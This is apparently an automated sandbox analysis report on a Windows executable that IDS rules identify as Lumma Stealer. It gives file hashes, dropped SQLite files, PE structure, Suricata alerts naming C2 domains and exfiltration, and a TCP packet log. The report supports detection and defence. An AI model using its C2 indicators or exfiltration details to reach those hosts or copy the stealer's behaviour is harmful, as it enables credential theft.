                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\DF072484EA4754E3.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):294912
                                                                                                      Entropy (8bit):0.08441928760034874
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                      MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                      SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                      SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                      SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\E8404DBFAF5F23C4.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.946724755314697
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:random(2).exe
                                                                                                      File size:1'835'008 bytes
                                                                                                      MD5:4c7602a935a7b24e6262acd38505eb9a
                                                                                                      SHA1:e1e15c5e8c053eb523ffeb3a24bbe857e41db489
                                                                                                      SHA256:57ccc2313dbc37566c73b42a74283f967d0502a60d276a90afa1dfbee6a74aff
                                                                                                      SHA512:e46c30db23353e75311fc3709b93cc00a7fb9a11c0be1c0a69a464bb8378e541eee850a404560fa361ec335f8b27a52d386c88d2eac4b8ff13ee8f9e10551662
                                                                                                      SSDEEP:24576:auEmWjQCgNbYBeY9j5DV+iUptxjA/eiHVQnTXPZuNDkaThws8tXSbCUBwHiRzasl:auEfQCC0BeYLV4Hse+QTMpko8dwTBt
                                                                                                      TLSH:43853395DBB9C420ED98C37080EA9B8531BCB2D603F891B719C680653117D17A7EADFE
                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................t............H...........@...........................H....._.....@.................................W...k..

                                                                                                      File Icon

                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x888000
                                                                                                      Entrypoint Section:.taggant
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x67BB1B1D [Sun Feb 23 12:57:01 2025 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp 00007F83153A627Ah
                                                                                                      pmaxub mm3, qword ptr [ebx]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add cl, ch
                                                                                                      add byte ptr [eax], ah
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add bl, bl
                                                                                                      add dword ptr [eax], eax
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [ecx], al
                                                                                                      add byte ptr [eax], 00000000h
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add dword ptr [eax+00000000h], 00000000h
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [ebx], cl
                                                                                                      add al, 00h
                                                                                                      add byte ptr [esi], cl
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [ecx], al
                                                                                                      add byte ptr [eax], 00000000h
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      jnle 00007F83153A61F2h
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5b0570x6b.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x388.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5b1f80x8.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      0x10000x590000x29a0056933c45689f077fc3289a98399619a7False0.999706737987988data7.977249264089444IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x5a0000x3880x40015d5238ea963e38777b9c0d978fd6724False0.4580078125data5.485474923230325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .idata 0x5b0000x10000x200ccf29f3d771c91d7d57f2be2d044b619False0.150390625data1.0437720338377494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      0x5c0000x2980000x2003a4b0b15b59c7ef968d45e1814ffe24eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      cnerjxoh0x2f40000x1930000x1926001a33eb8bbfac603b2a647937bebe0c49False0.994536225341721data7.954038506762716IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      ebptfdwj0x4870000x10000x600cdc8fc82864ce5e4736bd8e30210304cFalse0.5651041666666666data4.88002271023751IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .taggant0x4880000x30000x22008a7f805ee332dc6b0ad1fdc583d9e0bbFalse0.07284007352941177DOS executable (COM)0.8118920124857406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_MANIFEST0x5a0580x330XML 1.0 document, ASCII text, with CRLF line terminators0.4987745098039216

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      kernel32.dlllstrcpy

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2025-03-05T09:16:54.075836+01002060414ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top)1192.168.2.7615791.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.101743+01002060424ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life)1192.168.2.7500231.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.124936+01002060410ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun)1192.168.2.7622231.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.268847+01002060418ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online)1192.168.2.7571901.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.372742+01002060422ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun)1192.168.2.7623491.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.396054+01002060416ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life)1192.168.2.7560901.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.415778+01002060420ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu)1192.168.2.7505061.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.432215+01002060412ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today)1192.168.2.7629801.1.1.153UDP
                                                                                                      2025-03-05T09:16:54.955773+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749700104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:54.955773+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:55.204960+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:55.204960+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:55.745350+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749701104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:55.745350+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:57.213059+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:58.994747+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749703104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:58.994747+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703104.21.64.1443TCP
                                                                                                      2025-03-05T09:16:59.557880+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749703104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:00.218797+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749709104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:00.218797+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:02.544617+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749725104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:02.544617+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749725104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:19.514053+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749834104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:19.514053+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749834104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:20.952254+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749844104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:20.952254+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749844104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:22.981179+01002060413ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI)1192.168.2.749857104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:22.981179+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749857104.21.64.1443TCP
                                                                                                      2025-03-05T09:17:23.479116+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749857104.21.64.1443TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Mar 5, 2025 09:16:54.456777096 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:54.456819057 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.456890106 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:54.462019920 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:54.462033033 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.955692053 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.955773115 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:54.961110115 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:54.961129904 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:54.961482048 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.013804913 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.096564054 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.096564054 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.096723080 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.204974890 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.205020905 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.205050945 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.205073118 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.205076933 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.205112934 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.205135107 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.205176115 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.205229998 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.206667900 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.206686974 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.206712008 CET49700443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.206717968 CET44349700104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.243999958 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.244046926 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.244124889 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.244581938 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.244594097 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.745264053 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.745349884 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.746942997 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.746959925 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.747204065 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:55.749109983 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.749130011 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:55.749206066 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213059902 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213105917 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213133097 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213157892 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213186026 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.213190079 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213203907 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213217020 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.213715076 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213733912 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.213738918 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213747978 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.213968039 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.217924118 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.217978954 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.218017101 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.218029022 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.218502998 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.218508959 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.263832092 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.302762032 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.302814960 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.302867889 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.302886963 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.302901983 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:57.302951097 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.339236975 CET49701443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:57.339270115 CET44349701104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.521923065 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.521970987 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.522043943 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.522439003 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.522450924 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.994642019 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.994746923 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.995919943 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.995933056 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.996217966 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:58.997484922 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.997636080 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:58.997665882 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.557879925 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.557971954 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.558073044 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.558243990 CET49703443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.558263063 CET44349703104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.753413916 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.753482103 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:16:59.753540039 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.753854036 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:16:59.753866911 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.218729019 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.218796968 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.227283955 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.227298021 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.227583885 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.229368925 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.229470015 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.229496956 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.692126036 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.692226887 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:00.692274094 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.692553043 CET49709443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:00.692574978 CET44349709104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.071062088 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.071106911 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.071194887 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.071819067 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.071830034 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.544506073 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.544616938 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.545840025 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.545845985 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.546469927 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.547588110 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.547693968 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.547728062 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:02.547786951 CET49725443192.168.2.7104.21.64.1
                                                                                                      Mar 5, 2025 09:17:02.547801018 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:18.443047047 CET44349725104.21.64.1192.168.2.7
                                                                                                      Mar 5, 2025 09:17:18.443170071 CET44349725104.21.64.1192.168.2.7
